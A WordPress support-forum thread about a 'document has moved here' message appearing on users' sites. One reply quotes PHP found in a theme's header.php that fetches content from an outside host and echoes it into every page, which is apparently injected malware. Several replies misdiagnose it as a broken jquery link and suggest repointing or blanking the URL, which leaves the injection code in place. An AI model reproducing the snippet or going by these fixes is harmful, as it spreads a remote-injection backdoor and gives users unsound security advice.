• hi all, the following appeared on the top of all the pages on my site:

    “The document has moved here”

    The “here” links out [ dodgy link removed ]

    Has anyone had anything similar happen to them? I am using an eleganttheme and all was well yesterday.

    Thanks in advance

Viewing 10 replies - 16 through 25 (of 25 total)
  • I have removed SEO Plugin but still facing the problem ,
    sachinist.com is my site url, some body help me please

    Thanks in advance

    @ sachinist try disabling Cool Video Gallery Script you are using. Have you tried using alternate themes?

    @rdufour Try downloading a fresh version of AIO SEO plugin, maybe files you have are corrupted. If nothing works try contacting devs of AIO SEO or use SEO plugin by Yoast.

    P.S. If you’re using any paid theme hacked copy, you may want to get the license version.

    Cheers!
    Jin

    Had same problem and this fixed it for me. In my case the problem was in the header.php of some themes, not any plugins. Try this:

    1. search for this code section
    ———————————
    <?php
    if(function_exists(‘curl_init’))
    {
    $url = “https://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js&#8221;;
    $ch = curl_init();
    $timeout = 5;
    curl_setopt($ch,CURLOPT_URL,$url);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
    curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
    $data = curl_exec($ch);
    curl_close($ch);
    echo “$data”;
    }
    ?>
    ————————————

    2. The problem is that the reference to the jquery file in no longer valid. So download it (the uncompressed version) yourself from their site: https://blog.jquery.com/2011/09/01/jquery-1-6-3-released/

    3. Upload it to your own site then change the url:

    a. https://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js

    to
    b. https://www.*.*/*/jquery-1.6.3.min.js (replacing asterixes with your own valid website info from your uploaded file.

    4. Refresh to test your page. The message should not longer be there.

    Hope that helps!

    Guys i am also having the same problem with my domain name https://www.allowmebe18.com and also having solution for my website whenever i deactivate my ALL IN ONE SEO plugin this message disappears but it’s not a perfect solution. It Must be a virus ….

    I had the same problem.
    I used the “All in one SEO” plugin also.
    I deactivate the plugin and the message disappeared.

    Thread Starter jadi4100

    (@jadi4100)

    Thanks to worlembrace for the insight into fixing this issue. The jquery link was indeed broken however when I try to fix it using the described method, the page reloads with the entire jquery code visible at the top of the page in place of the original error :/ any ideas on how to make it not do that?

    Thanks for all the suggestions and help so far people! ??

    Very very Thanks for WOMBERLANCE! great solution, problem is finished! Congratulations and thanks so much for your colaboration! ??

    All the guys found the solution?

    The link to jquery-1.6.3.min.js its not avaliable anymore.
    $url = “https://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js&#8221;;

    I found a solutio that works for me very fine e simple:
    Just erase all the path of link to jquery like that:
    $url = “”;

    It’s simple!

    – worlembrace – fixed the problem folks. Thanks. Works!

    jellybeankey

    (@jellybeankey)

    As Henry M Kalango said, simply remove url, nice one bro!

Viewing 10 replies - 16 through 25 (of 25 total)
  • The topic ‘strange message appears at the top of my index page1 help please’ is closed to new replies.